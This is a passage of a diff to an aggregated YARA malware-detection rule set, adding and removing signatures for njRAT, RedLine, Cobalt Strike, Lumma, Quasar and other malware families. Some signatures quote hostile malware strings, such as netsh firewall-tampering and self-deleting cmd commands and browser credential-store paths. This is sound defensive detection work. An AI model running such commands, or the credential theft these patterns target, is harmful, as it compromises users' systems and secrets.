+		source_url = "https://github.com/dr4k0nia/yara-rules/blob/4b10f9b79a4cfb3ec9cb5675f32cc7ee6885fbd8/dotnet/msil_mal_niximports_loader.yar#L1-L21"
+		license_url = "https://github.com/dr4k0nia/yara-rules/blob/4b10f9b79a4cfb3ec9cb5675f32cc7ee6885fbd8/LICENSE.md"
+		logic_hash = "79421b2677705852f893fa53478deb2e4aa8bd354ac05cbf5438a3a2a15d70bf"
+		score = 75
+		quality = 85
+		tags = "FILE"
+
+	strings:
+		$op_pe = {C2 95 C2 97 C2 B2 C2 92 C2 82 C2 82 C2 8E C2 82 C2 82 C2 82 C2 82 C2 86 C2 82}
+		$op_delegate = {20 F0 C7 FF 80 20 83 BF 7F 1F 14 14}
+		$a1 = "GetRuntimeProperties" ascii fullword
+		$a2 = "GetTypes" ascii fullword
+		$a3 = "GetRuntimeMethods" ascii fullword
+		$a4 = "netstandard" ascii fullword
+
+	condition:
+		uint16( 0 ) == 0x5a4d and filesize < 3MB and all of ( $a* ) and 2 of ( $op* )
+}
 
 rule DR4K0NIA_Msil_Suspicious_Use_Of_Strreverse : FILE
 {
@@ -162803,50 +163432,11 @@ rule DR4K0NIA_Msil_Suspicious_Use_Of_Strreverse : FILE
 	condition:
 		uint16( 0 ) == 0x5a4d and dotnet.is_dotnet and filesize < 50MB and $csharp and $vbnet and $strreverse
 }
-
-rule DR4K0NIA_Msil_Susp_Obf_Antidump : FILE
-{
-	meta:
-		description = "No description has been set in the source file - Dr4k0nia"
-		author = "dr4k0nia"
-		id = "d9217ade-a016-548e-b63f-f6ee78ff8775"
-		date = "2023-12-03"
-		modified = "2023-03-13"
-		reference = "https://github.com/dr4k0nia/yara-rules"
-		source_url = "https://github.com/dr4k0nia/yara-rules/blob/4b10f9b79a4cfb3ec9cb5675f32cc7ee6885fbd8/dotnet/msil_susp_obf_antidump.yar#L7-L39"
-		license_url = "https://github.com/dr4k0nia/yara-rules/blob/4b10f9b79a4cfb3ec9cb5675f32cc7ee6885fbd8/LICENSE.md"
-		hash = "ef7bb2464a2b430aa98bd65a1a40b851b57cb909ac0aea3e53729c0ff900fa42"
-		logic_hash = "18cfc720f54b2178398f8214591a3fb777ea11e67a8a6d2ce26cc4891a62fd35"
-		score = 65
-		quality = 85
-		tags = "FILE"
-		version = "1.0"
-
-	strings:
-		$import0 = "ZeroMemory"
-		$import1 = "VirtualProtect"
-		$importt2 = "GetCurrentProcess"
-		$array0 = {08 00 00 00 0c 00 00 00 10 00 00 00 14 00 00 00
-		18 00 00 00 1c 00 00 00 24 00 00 00}
-		$array1 = {04 00 00 00 16 00 00 00 18 00 00 00 40 00 00 00
-		42 00 00 00 44 00 00 00 46 00 00 00 48 00 00 00
-		4a 00 00 00 4c 00 00 00 5c 00 00 00 5e 00 00 00}
-		$array2 = {00 00 00 00 08 00 00 00 0c 00 00 00 10 00 00 00
-		16 00 00 00 1c 00 00 00 20 00 00 00 28 00 00 00
-		2c 00 00 00 34 00 00 00 3c 00 00 00 4c 00 00 00
-		50 00 00 00 54 00 00 00 58 00 00 00 60 00 00 00
-		64 00 00 00 68 00 00 00 6c 00 00 00 70 00 00 00
-		74 00 00 00 04 01 00 00 08 01 00 00 0c 01 00 00
-		10 01 00 00 14 01 00 00 1c 01 00 00}
-
-	condition:
-		uint16( 0 ) == 0x5a4d and dotnet.is_dotnet and all of them
-}
 /*
  * YARA Rule Set
  * Repository Name: EmbeeResearch
  * Repository: https://github.com/embee-research/Yara-detection-rules/
- * Retrieval Date: 2025-06-08
+ * Retrieval Date: 2025-06-15
  * Git Commit: ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4
  * Number of Rules: 39
  * Skipped: 0 (age), 8 (quality), 0 (score), 0 (importance)
@@ -162856,237 +163446,90 @@ rule DR4K0NIA_Msil_Susp_Obf_Antidump : FILE
  *
  * NO LICENSE SET
  */
-
-rule EMBEERESEARCH_Win_Njrat_Bytecodes_Oct_2023
-{
-	meta:
-		description = ""
-		author = "Matthew @ Embee_Research"
-		id = "9e39587a-e878-5f99-806f-e9964952f0ac"
-		date = "2023-10-03"
-		modified = "2023-10-03"
-		reference = "https://github.com/embee-research/Yara-detection-rules/"
-		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_njrat_bytecodes_oct_2023.yar#L3-L22"
-		license_url = "N/A"
-		hash = "59d6e2958780d15131c102a93fefce6e388e81da7dc78d9c230aeb6cab7e3474"
-		hash = "4c56ade4409add1d78eac3b202a9fbd6afbd71878c31f798026082467ace2628"
-		hash = "d5a78790a1b388145424327e78f019584466d30d2d450bba832c0128aa3cd274"
-		logic_hash = "7df39219e2f2da55e461b1536e92ab125d488a048e41daaaa1fb9516be395d10"
-		score = 75
-		quality = 75
-		tags = ""
-
-	strings:
-		$s1 = {14 80 ?? ?? ?? ?? 16 80 ?? ?? ?? ?? 72 ?? ?? ?? ?? 80 ?? ?? ?? ?? 14 80 ?? ?? ?? ?? 73 ?? ?? ?? ?? 80 ?? ?? ?? ?? 20 ?? ?? ?? ?? 8D ?? ?? ?? ?? 80 ?? ?? ?? ?? 72 ?? ?? ?? ?? 80 ?? ?? ?? ?? 14 80 ?? ?? ?? ?? 2A }
-
-	condition:
-		dotnet.is_dotnet and $s1
-}
-rule EMBEERESEARCH_Win_Redline_Payload_Dec_2023
-{
-	meta:
-		description = "Patterns observed in redline"
-		author = "Matthew @ Embee_Research"
-		id = "6208779a-69b2-55b5-9744-987575c00d96"
-		date = "2023-12-24"
-		modified = "2023-12-29"
-		reference = "https://github.com/embee-research/Yara-detection-rules/"
-		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_redline_payload_dec_2023.yar#L1-L16"
-		license_url = "N/A"
-		hash = "5790aead07ce0b9b508392b9a2f363ef77055ae16c44231773849c87a1dd15a4"
-		logic_hash = "d016baa5017120a3037e9cef7fd649228f7be60e511ecbdedf97916f59eec881"
-		score = 75
-		quality = 75
-		tags = ""
-
-	strings:
-		$s1 = {16 72 ?? ?? ?? 70 A2 7E ?? ?? ?? 04 17 72 ?? ?? ?? 70 7E ?? ?? ?? 04 16 9A 28 ?? ?? ?? 06 A2 7E ?? ?? ?? 04 18 72 ?? ?? ?? 70 }
-
-	condition:
-		all of them
-}
-
-rule EMBEERESEARCH_Win_Njrat_Bytecodes_V2_Oct_2023
-{
-	meta:
-		description = ""
-		author = "Matthew @ Embee_Research"
-		id = "9090574e-7ad4-5207-af8b-7b56f2a1c917"
-		date = "2023-10-03"
-		modified = "2023-10-08"
-		reference = "https://github.com/embee-research/Yara-detection-rules/"
-		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_njrat_bytecodes_v2_oct_2023.yar#L5-L27"
-		license_url = "N/A"
-		hash = "9877fc613035d533feda6adc6848e183bf8c8660de3a34b1acd73c75e62e2823"
-		hash = "40f07bdfb74e61fe7d7973bcd4167ffefcff2f8ba2ed6f82e9fcb5a295aaf113"
-		logic_hash = "0bdbf5715e3873d96c88a24ba08487af2b798d26cdcd3e35d783ce4828dae775"
-		score = 75
-		quality = 75
-		tags = ""
-
-	strings:
-		$s1 = {03 1F 72 2E ?? 03 1F 73 2E ?? 03 1F 74 2E ?? 03 1F 75 2E ?? 03 1F 76 2E ?? }
-		$s2 = {0B 14 0C 16 0D 16 13 ?? 16 13 ?? 14}
-
-	condition:
-		dotnet.is_dotnet and ( all of ( $s* ) )
-}
-rule EMBEERESEARCH_Win_Marsstealer_Encryption_Bytecodes
-{
-	meta:
-		description = "Encryption observed in MarsStealer"
-		author = "Matthew @ Embee_Research"
-		id = "7a66ea9c-966e-5780-8b36-a268904b9c1b"
-		date = "2023-12-24"
-		modified = "2023-12-24"
-		reference = "https://github.com/embee-research/Yara-detection-rules/"
-		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_marsStealer_encryption_bytecodes_dec_2023.yar#L1-L16"
-		license_url = "N/A"
-		hash = "7a391340b6677f74bcf896b5cc16a470543e2a384049df47949038df5e770df1"
-		logic_hash = "49ffde28c8823c00959ddbaa516fc48c7908b533c8f91608b0e3a645045c9048"
-		score = 75
-		quality = 75
-		tags = ""
-
-	strings:
-		$s1 = {31 2d 3d 31 73 30 02 39 c0 74 0a 5b 70 61 73 64 6c 30 71 77 69 8d 5b 01 8d 52 01 39 eb 75 03 83 eb 20 39 ca}
-
-	condition:
-		$s1
-}
-rule EMBEERESEARCH_Win_Redline_Bytecodes_Jan_2024 : FILE
+rule EMBEERESEARCH_Win_Cobalt_Sleep_Encrypt : FILE
 {
 	meta:
-		description = "Bytecodes found in late 2023 Redline malware"
+		description = "Detects Sleep Encryption Logic Found in Cobalt Strike Deployments"
 		author = "Matthew @ Embee_Research"
-		id = "8acf0fbb-f7d1-5a3d-9ccb-ee21926d6a31"
+		id = "6bd6fbb4-6634-5b51-90f0-f24e48d69043"
 		date = "2023-08-27"
-		modified = "2024-01-02"
+		modified = "2023-10-18"
 		reference = "https://github.com/embee-research/Yara-detection-rules/"
-		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_redline_bytecodes_jan_2024.yar#L1-L22"
+		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_cobalt_sleep_encrypt_aug_2023.yar#L1-L55"
 		license_url = "N/A"
-		hash = "ea1271c032046d482ed94c6d2c2c6e3ede9bea57dff13156cabca42b24fb9332"
-		logic_hash = "43f4d718611c16983071587c2806f92550ebba6bae737c59c63cd8584a5cc01f"
+		hash = "26b2f12906c3590c8272b80358867944fd86b9f2cc21ee6f76f023db812e5bb1"
+		logic_hash = "7aa2674ecaaae819c3f26924fa0622df322b1214493f37b1bdf5e00ba5ee98e6"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$s1 = {00 00 7E ?? ?? ?? 04 7E ?? ?? ?? 04 28 ?? ?? ?? 06 17 8D ?? ?? ?? 01 25 16 1F 7C 9D 6F ?? ?? ?? 0A 13 ?? 16 13 ?? 38 }
-		$s2 = "mscoree.dll" ascii
+		$r1_nokey = {4E 8B 04 08 B8 ?? ?? ?? ?? 41 F7 E3 41 8B C3 C1 EA 02 41 FF C3 6B D2 0D 2B C2 8A 4C 18 18 41 30 0C 38 48 8B 43 10 41 8B FB 4A 3B 7C 08 08}
+		$r2_nokey = {49 8B F9 4C 8B 03 B8 ?? ?? ?? ?? 41 F7 E1 41 8B C1 C1 EA 02 41 FF C1 6B D2 0D 2B C2 8A 4C 18 18 42 30 0C 07 48 FF C7 45 3B CB}
 
 	condition:
-		$s1 and $s2 and uint16( 0 ) == 0x5a4d
+		($r1_nokey or $r2_nokey )
 }
-rule EMBEERESEARCH_Win_Orcus_Rat_Simple_Strings_Dec_2023
+rule EMBEERESEARCH_Win_Redline_Updated_Bytecodes_Oct_2023
 {
 	meta:
-		description = "Strings observed in Orcus RAT"
+		description = "Configuration related bytecodes in redline .net files"
 		author = "Matthew @ Embee_Research"
-		id = "baef6b96-bf94-5363-9186-9761a8055afd"
-		date = "2023-12-24"
-		modified = "2023-12-24"
-		reference = "https://github.com/embee-research/Yara-detection-rules/"
-		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_orcus_rat_simple_strings_dec_2023.yar#L1-L26"
-		license_url = "N/A"
-		hash = "30a2a674d55d7898d304713dd2f69a043d875230ea7ebee22596ba4c640768db"
-		logic_hash = "2e0a44ec2749e0fc646dfb003a2d32b3fecfa07ece72ca5a65116250d80496b8"
-		score = 75
-		quality = 75
-		tags = ""
-
-	strings:
-		$s1 = "Orcus is a Remote Administration Tool for Windows. It allows the administrator to make changes to the system remotely." wide
-		$s2 = "Orcus.Service" wide
-		$s4 = "costura.orcus" wide
-		$s5 = "Orcus.Commands"
-		$s6 = "Orcus.Shared"
-		$s7 = "Orcus.Utilities"
-		$s8 = "Orcus.StaticCommands"
-		$s9 = "Orcus.Plugins"
-
-	condition:
-		(5 of them )
-}
-
-rule EMBEERESEARCH_Win_Agent_Tesla_Bytecodes_Sep_2023
-{
-	meta:
-		description = "No description has been set in the source file - EmbeeResearch"
-		author = "Matthew @embee_research"
-		id = "9d1c5010-7c64-5a6a-bf60-35c042732761"
-		date = "2023-09-21"
-		modified = "2023-09-21"
+		id = "1e4470cf-fad3-57e5-8a95-deb97e98dbdc"
+		date = "2023-10-11"
+		modified = "2023-10-11"
 		reference = "https://github.com/embee-research/Yara-detection-rules/"
-		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_agent_tesla_bytecodes_sep_2023.yar#L4-L21"
+		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_redline_bytecodes_oct_2023.yar#L2-L35"
 		license_url = "N/A"
-		hash = "ce696cf7a6111f5e7c6781854de04ddc262b6c9b39c059fd5435dfb3b8901f04"
-		hash = "afc29232c4989587db2c54b7c9f145fd0d73537e045ece15338582ede5389fce"
-		hash = "fba4374163ba25c9dc572f1a5d7f3e46e09531ab964d808f3dde2a19c05a2ee5"
-		logic_hash = "1cc40ab16dfa5245b3146e4512509037f540d59e155040a2336a97cd0f42e612"
+		hash = "0cc3a0f8b48ef8d8562b9cdf9c7cfe7f63faf43a5ac6dc6973dc8bf13b6c88cf"
+		logic_hash = "77273ba3736baf2c197fb8b17de1e22ba8f2380f73f9114f324ef56bfa508654"
 		score = 75
 		quality = 75
 		tags = ""
 
 	strings:
-		$s1 = {8F ?? ?? ?? ?? 25 47 FE ?? ?? ?? FE ?? ?? ?? 91 61 D2 52 20 ?? ?? ?? ?? FE ?? ?? ?? }
-
-	condition:
-		dotnet.is_dotnet and $s1
-}
-
-rule EMBEERESEARCH_Win_Solarmarker_Bytecodes : FILE
-{
-	meta:
-		description = "Detects bytecodes present in solarmarker Packer"
-		author = "Matthew @ Embee_Research"
-		id = "d405e7ae-f09b-5993-a510-e5e1bc289898"
-		date = "2023-09-10"
-		modified = "2023-09-11"
-		reference = "https://github.com/embee-research/Yara-detection-rules/"
-		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_solarmarker_bytecodes_aug_2023.yar#L3-L21"
-		license_url = "N/A"
-		hash = "a433dad1e31f2e19ab5d22b6348c73fa4c874502acc20d5517d785b554754279"
-		logic_hash = "52256184706b7173ee8e8683ac79c1b9d4773778c135e4dae255376c0a6651fb"
-		score = 75
-		quality = 75
-		tags = "FILE"
-
-	strings:
-		$s1 = {8C ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 20 ?? ?? ?? ?? 13 ?? 06 11 ?? 20 ?? ?? ?? ?? 58 D1 8C ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 20 ?? ?? ?? ?? 13 ?? 06 11 ?? 20 ?? ?? ?? ?? 58 D1 8C ?? ?? ?? ?? 28 ?? ?? ?? ??}
+		$s_1 = {
+				20 ?? ?? ?? ?? 											// ldc.i4
+				2B 00       											// br.s
+				28 ?? ?? ?? 2B 											// Call
+				80 ?? ?? ?? 04 											// stsfld
+				(20 ?? ?? ?? ?? 2B00 28 ?? ?? ?? 2B | 72 ?? ?? ?? 70)   // ldc.i4, br.s, call OR ldstr
+				80 ?? ?? ?? 04      									// Call
+				(20 ?? ?? ?? ?? 2B00 28 ?? ?? ?? 2B | 72 ?? ?? ?? 70)   // ldc.i4, br.s, call OR ldstr
+				80 ?? ?? ?? 04 											// Call		
+				20 ?? ?? ?? ?? 											// ldc.i4
+				2B00            										// br.s
+				28 ?? ?? ?? 2B      									// Call
+				80 ?? ?? ?? 04 											// stsfld
+				2A 														// ret
+			}
+		$s_2 = "mscoree.dll"
 
 	condition:
-		dotnet.is_dotnet and filesize < 7000KB and $s1
+		$s_1 and $s_2
 }
-
-rule EMBEERESEARCH_Win_Quasar_Rat_Client : FILE
+rule EMBEERESEARCH_Win_Ursnif_Patterns_Oct_2022
 {
 	meta:
-		description = "Detects strings present in Quasar Rat Samples."
-		author = "Matthew @ Embee_Research"
-		id = "7fc0bd6d-e187-51b7-a8b8-68b17271cef8"
-		date = "2023-08-27"
-		modified = "2023-10-18"
+		description = "No description has been set in the source file - EmbeeResearch"
+		author = "Embee_Research @ Huntress"
+		id = "2c8da2b7-63f2-5cce-86ab-8a88f50d0263"
+		date = "2022-10-14"
+		modified = "2023-06-14"
 		reference = "https://github.com/embee-research/Yara-detection-rules/"
-		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_quasar_rat_client_aug_2023.yar#L3-L37"
+		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_ursnif_patterns_oct_2022.yar#L1-L14"
 		license_url = "N/A"
-		hash = "914d88f295ac2213f37d3f71e6d4383979283d1728079a208f286effb44d840c"
-		hash = "45a724179ae1d08044c4bafb69c7f9cdb4ed35891dc9cf24aa664d75464ceb6d"
-		hash = "7e13bcd73232c3f33410aa95f61e1196a2f9ae35e05c1f9c8f251e07077a9dfb"
-		logic_hash = "efba911780ffb144f277e88ff8ca8f53a90c32a677ccb19ec26e71f974a1b91f"
+		logic_hash = "241804ea3b7ac98071c533d9a98a45cdd0f7043f11994327c1f79e29f5fdce2c"
 		score = 75
 		quality = 75
-		tags = "FILE"
+		tags = ""
 
 	strings:
-		$s1 = "Quasar Client" ascii wide
-		$s2 = "Quasar.Client.Properties.Resources" ascii wide
-		$s3 = "Google\\Chrome\\User Data\\Default\\" wide
-		$s4 = "\\Mozilla\\Firefox\\Profiles" wide
-		$s5 = "Yandex\\YandexBrowser\\User Data\\Default\\" wide
+		$ursnif = {41 c1 e8 02 45 33 d2 45 8b d9 45 85 c0 74 2f 48 2b ca 83 7c 24 28 00 8b 04 11 44 8b c8 74 0a 85 c0 75 06 44 8d 40 01}
+		$script = "65,193,232,2,69,51,210,69,139,217,69,133,192,116,47,72,43,202,131,124,36,40,0,139,4,17,68,139,200,116,10,133,192,117,6,68,141,64,1"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and dotnet.is_dotnet and filesize < 7000KB and ( for any i in ( 0 .. dotnet.number_of_resources -1 ) : ( dotnet.resources [ i ] . name == "Quasar.Client*" ) or ( 3 of ( $s* ) ) )
+		any of them
 }
 
 rule EMBEERESEARCH_Win_Icedid_Snowloader_Bytecodes_Oct_2023
@@ -163117,35 +163560,6 @@ rule EMBEERESEARCH_Win_Icedid_Snowloader_Bytecodes_Oct_2023
 		( all of ( $s* ) ) and pe.number_of_exports > 20
 }
 
-rule EMBEERESEARCH_Win_Njrat_Strings_Oct_2023
-{
-	meta:
-		description = ""
-		author = "Matthew @ Embee_Research"
-		id = "c89711cb-aae9-5409-80c2-145a8d5fca56"
-		date = "2023-10-03"
-		modified = "2023-10-03"
-		reference = "https://github.com/embee-research/Yara-detection-rules/"
-		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_njrat_strings_oct_2023.yar#L3-L25"
-		license_url = "N/A"
-		hash = "59d6e2958780d15131c102a93fefce6e388e81da7dc78d9c230aeb6cab7e3474"
-		logic_hash = "ed36a991aa2699486f1ef34f4f4d559a3dd351180602f017ad7d868e146c703b"
-		score = 75
-		quality = 75
-		tags = ""
-
-	strings:
-		$s1 = "netsh firewall delete allowedprogram" wide
-		$s2 = "cmd.exe /c ping 0 -n 2 & del" wide
-		$s3 = "netsh firewall add allowedprogram" wide
-		$s4 = "Execute ERROR" wide
-		$s5 = "Update ERROR" wide
-		$s6 = "Download ERROR" wide
-
-	condition:
-		dotnet.is_dotnet and ( all of ( $s* ) )
-}
-
 rule EMBEERESEARCH_Win_Pikabot_Resource_Entropy_Oct_2023
 {
 	meta:
@@ -163179,30 +163593,6 @@ rule EMBEERESEARCH_Win_Pikabot_Resource_Entropy_Oct_2023
 	condition:
 		pe.DLL and ( all of ( $s* ) ) and pe.number_of_resources > 25 and pe.sections [ 3 ] . raw_data_size > 400KB and math.entropy ( pe.sections [ 3 ] . raw_data_offset , pe.sections [ 3 ] . raw_data_size ) > 7.5
 }
-rule EMBEERESEARCH_Win_Solarmarker_Stage2_Bytecodes_Dec_2023
-{
-	meta:
-		description = "Patterns observed in Solarmarker stage2 dll"
-		author = "Matthew @ Embee_Research"
-		id = "9aba6cdf-1491-579d-b4a7-fe229272015d"
-		date = "2023-12-28"
-		modified = "2023-12-28"
-		reference = "https://github.com/embee-research/Yara-detection-rules/"
-		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_solarmarker_stage2_bytecodes_dec_2023.yar#L1-L20"
-		license_url = "N/A"
-		hash = "4a3b60496a793ee96a51fecf8690ef8312429a6b54d32f2a4424395c47b47fc8"
-		hash = "e0b2457491a8c2d50710aa343ad1957a76f83ceaf680165ffa0e287fe18abbd6"
-		logic_hash = "8e50e5942f0029ffda1d9750f8cc8e004a2512e50b6a14c1619ae0b83477a944"
-		score = 75
-		quality = 75
-		tags = ""
-
-	strings:
-		$s1 = {6F ?? ?? 00 0A 1F 20 2E ?? 02 7B ?? ?? 00 04 02 7B ?? ?? 00 04 6F ?? ?? 00 0A 1F 09 2E ?? 02 7B ?? ?? 00 04 02 7B ?? ?? 00 04 6F ?? ?? 00 0A 1F 0A 2E ?? 02 7B ?? ?? 00 04 02 7B ?? ?? 00 04 6F ?? ?? 00 0A 1F 0D 2E ?? 02 7B ?? ?? 00 04 02 7B ?? ?? 00 04 6F ?? ?? 00 0A 1F 0A }
-
-	condition:
-		$s1
-}
 
 rule EMBEERESEARCH_Win_Xworm_Bytestring
 {
@@ -163228,330 +163618,341 @@ rule EMBEERESEARCH_Win_Xworm_Bytestring
 	condition:
 		dotnet.is_dotnet and $p1
 }
-rule EMBEERESEARCH_Win_Redline_Loader_Dec_2023
+rule EMBEERESEARCH_Win_Redline_Payload_Dec_2023
 {
 	meta:
-		description = "Patterns observed in redline loader"
+		description = "Patterns observed in redline"
 		author = "Matthew @ Embee_Research"
-		id = "59d933a8-8ccd-565f-b379-e0bf6c3d3111"
+		id = "6208779a-69b2-55b5-9744-987575c00d96"
 		date = "2023-12-24"
 		modified = "2023-12-29"
 		reference = "https://github.com/embee-research/Yara-detection-rules/"
-		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_redline_loader_dec_2023.yar#L1-L20"
+		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_redline_payload_dec_2023.yar#L1-L16"
 		license_url = "N/A"
-		hash = ""
-		logic_hash = "831c32f9998b97f7ceeb14df73a264a998df5f8800aaa5271755aaaeac070010"
+		hash = "5790aead07ce0b9b508392b9a2f363ef77055ae16c44231773849c87a1dd15a4"
+		logic_hash = "d016baa5017120a3037e9cef7fd649228f7be60e511ecbdedf97916f59eec881"
 		score = 75
 		quality = 75
 		tags = ""
 
 	strings:
-		$s1 = {8b ?? ?? 0c 30 04 31 46 3b f7 7c ?? 5d 5b 5e 83 ?? ?? 75}
-		$s2 = "WritePrivateProfileStringA"
-		$s3 = "SetFileShortNameA"
-		$s4 = "- Attempt to use MSIL code from this assembly during native code initialization"
+		$s1 = {16 72 ?? ?? ?? 70 A2 7E ?? ?? ?? 04 17 72 ?? ?? ?? 70 7E ?? ?? ?? 04 16 9A 28 ?? ?? ?? 06 A2 7E ?? ?? ?? 04 18 72 ?? ?? ?? 70 }
 
 	condition:
 		all of them
 }
-rule EMBEERESEARCH_Win_Stealc_Bytecodes_Oct_2023
+rule EMBEERESEARCH_Win_Orcus_Rat_Simple_Strings_Dec_2023
 {
 	meta:
-		description = "Bytecodes present in Stealc decoding routine"
+		description = "Strings observed in Orcus RAT"
 		author = "Matthew @ Embee_Research"
-		id = "ecac28a0-cd77-5e6a-8af2-59ea62e733bf"
-		date = "2023-08-27"
-		modified = "2023-10-09"
+		id = "baef6b96-bf94-5363-9186-9761a8055afd"
+		date = "2023-12-24"
+		modified = "2023-12-24"
 		reference = "https://github.com/embee-research/Yara-detection-rules/"
-		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_stealc_bytecodes_oct_2023.yar#L2-L21"
+		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_orcus_rat_simple_strings_dec_2023.yar#L1-L26"
 		license_url = "N/A"
-		hash = "74ff68245745b9d4cec9ef3c539d8da15295bdc70caa6fdb0632acdd9be4130a"
-		hash = "9f44a4cbc30e7a05d7eb00b531a9b3a4ada5d49ecf585b48892643a189358526"
-		logic_hash = "d50f57e32a7f513d92625549fcd139b7fa1e478879283fd61426fcd19d03d296"
+		hash = "30a2a674d55d7898d304713dd2f69a043d875230ea7ebee22596ba4c640768db"
+		logic_hash = "2e0a44ec2749e0fc646dfb003a2d32b3fecfa07ece72ca5a65116250d80496b8"
 		score = 75
 		quality = 75
 		tags = ""
 
 	strings:
-		$s1 = {8b 4d f0 89 4d f8 8b 45 f8 c1 e0 03 33 d2 b9 06 00 00 00 f7 f1 8b e5 5d c2 04 00}
+		$s1 = "Orcus is a Remote Administration Tool for Windows. It allows the administrator to make changes to the system remotely." wide
+		$s2 = "Orcus.Service" wide
+		$s4 = "costura.orcus" wide
+		$s5 = "Orcus.Commands"
+		$s6 = "Orcus.Shared"
+		$s7 = "Orcus.Utilities"
+		$s8 = "Orcus.StaticCommands"
+		$s9 = "Orcus.Plugins"
 
 	condition:
-		( all of ( $s* ) )
+		(5 of them )
 }
-rule EMBEERESEARCH_Win_Lumma_Update_Simple_Strings_Sep_2023 : FILE
+
+rule EMBEERESEARCH_Win_Solarmarker_Bytecodes : FILE
+{
+	meta:
+		description = "Detects bytecodes present in solarmarker Packer"
+		author = "Matthew @ Embee_Research"
+		id = "d405e7ae-f09b-5993-a510-e5e1bc289898"
+		date = "2023-09-10"
+		modified = "2023-09-11"
+		reference = "https://github.com/embee-research/Yara-detection-rules/"
+		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_solarmarker_bytecodes_aug_2023.yar#L3-L21"
+		license_url = "N/A"
+		hash = "a433dad1e31f2e19ab5d22b6348c73fa4c874502acc20d5517d785b554754279"
+		logic_hash = "52256184706b7173ee8e8683ac79c1b9d4773778c135e4dae255376c0a6651fb"
+		score = 75
+		quality = 75
+		tags = "FILE"
+
+	strings:
+		$s1 = {8C ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 20 ?? ?? ?? ?? 13 ?? 06 11 ?? 20 ?? ?? ?? ?? 58 D1 8C ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 20 ?? ?? ?? ?? 13 ?? 06 11 ?? 20 ?? ?? ?? ?? 58 D1 8C ?? ?? ?? ?? 28 ?? ?? ?? ??}
+
+	condition:
+		dotnet.is_dotnet and filesize < 7000KB and $s1
+}
+rule EMBEERESEARCH_Win_Lumma_Simple_Strings : FILE
 {
 	meta:
 		description = ""
 		author = "Matthew @ Embee_Research"
-		id = "90209fc6-fd50-5b55-a400-112b2f207885"
+		id = "d949d547-a2ee-56d9-8510-74f3b718b2c0"
 		date = "2023-09-13"
 		modified = "2023-09-21"
 		reference = "https://github.com/embee-research/Yara-detection-rules/"
-		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_lumma_updated_sep_2023.yar#L1-L25"
+		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_lumma _simple_sep_2023.yar#L1-L40"
 		license_url = "N/A"
-		hash = "898a2bdbbb33ccd63b038c67d217554a668a52e9642874bd0f57e08153e6e5be"
-		logic_hash = "61571057a5a9c114b6ed5b94b922f2b389406a05e705b3e9e6ddbee221f74c92"
+		hash = "277d7f450268aeb4e7fe942f70a9df63aa429d703e9400370f0621a438e918bf"
+		logic_hash = "0b3cb6721d26b79afe892b1c4df5e54c18cd7a5492aeacd442deca6b9b926f3c"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$s1 = "Do you want to run a malware ?" wide
-		$s2 = "c2sock" wide
-		$s3 = "TeslaBrowser/5" wide
-		$s4 = "Crypt build to disable this message" wide
+		$s1 = "Binedx765ance Chaedx765in Waledx765let" wide
+		$s2 = "%appdaedx765ta%\\Moedx765zilla\\Firedx765efox\\Profedx765iles"
+		$s3 = "\\Locedx765al Extensedx765ion Settinedx765gs\\"
+		$s4 = "%appdedx765ata%\\Opedx765era Softwedx765are\\Opedx765era GX Staedx765ble"
+		$o1 = {57 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 65 00 62 00 20 00 44 00 61 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 74 00 61 00}
